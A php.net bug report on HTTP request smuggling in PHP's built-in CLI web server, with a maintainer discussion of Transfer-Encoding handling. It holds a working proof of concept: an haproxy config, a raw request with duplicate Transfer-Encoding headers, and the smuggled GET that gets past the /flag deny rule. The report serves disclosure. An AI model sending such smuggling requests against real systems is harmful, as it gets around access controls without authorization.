php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #80043 HTTP Request Smuggling in php webserver
Submitted: 2020-09-01 07:09 UTC Modified: 2021-11-15 15:42 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: kn0wns1c at gmail dot com Assigned:
Status: Open Package: Built-in web server
PHP Version: master-Git-2020-09-01 (Git) OS:
Private report: No CVE-ID: None
 [2020-09-01 07:09 UTC] kn0wns1c at gmail dot com
Description:
------------
functions php_http_parser_execute in sapi\cli\php_http_parser.c parse http request. when I send to two Transfer-Encoding header, one true one false, in one http request, it will thouth that is a legal request. a attacker may use this feature make a HTTP Request Smuggling attack.

for example, using haproxy to make CL-TE attack:

haproxy 1.5.3 version haproxy.cfg
haproxy.cfg forbid access /flag URI

```
global
 daemon
 maxconn 256

defaults
 mode http
 timeout connect 5000ms
 timeout client 50000ms
 timeout server 50000ms

frontend http-in
 bind *:80
 default_backend servers
 acl url_403 path_beg -i /flag
 http-request deny if url_403

backend servers
 server server1 127.0.0.1:8080 maxconn 32

```
run php webserver

```
php -S 127.0.0.1:8080
```

use this http request can bypass haproxy /flag restrict

```
POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked
Transfer-Encoding: chunked-false
Content-Length: 50

1
A
0

GET /flag HTTP/1.1
Host: 127.0.0.1


```


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2020-09-01 07:12 UTC] stas@php.net
-Type: Security +Type: Bug
 [2020-09-01 07:12 UTC] stas@php.net
PHP CLI server is a debug feature and as such bugs in it are not security issues. See https://www.php.net/manual/en/features.commandline.webserver.php
 [2021-11-15 15:42 UTC] cmb@php.net
> Transfer-Encoding: chunked-false

According to RFC 7230, section 3.3.1[1], the built-in Webserver
should respond with 501 (Not implemented), since it doesn't
support this tranfer coding.  However, such faked values are a
very minor problem here.  The bigger problem is that the built-in
Webserver does not even understand generally know values, such as

  Transfer-Encoding: gzip, chunked

but does not reply with 501 either.  The only understood
Transfer-Encoding value is `chunked`.  We may consider to change
this to doc problem.

[1] <https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.1>
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue Dec 03 16:01:33 2024 UTC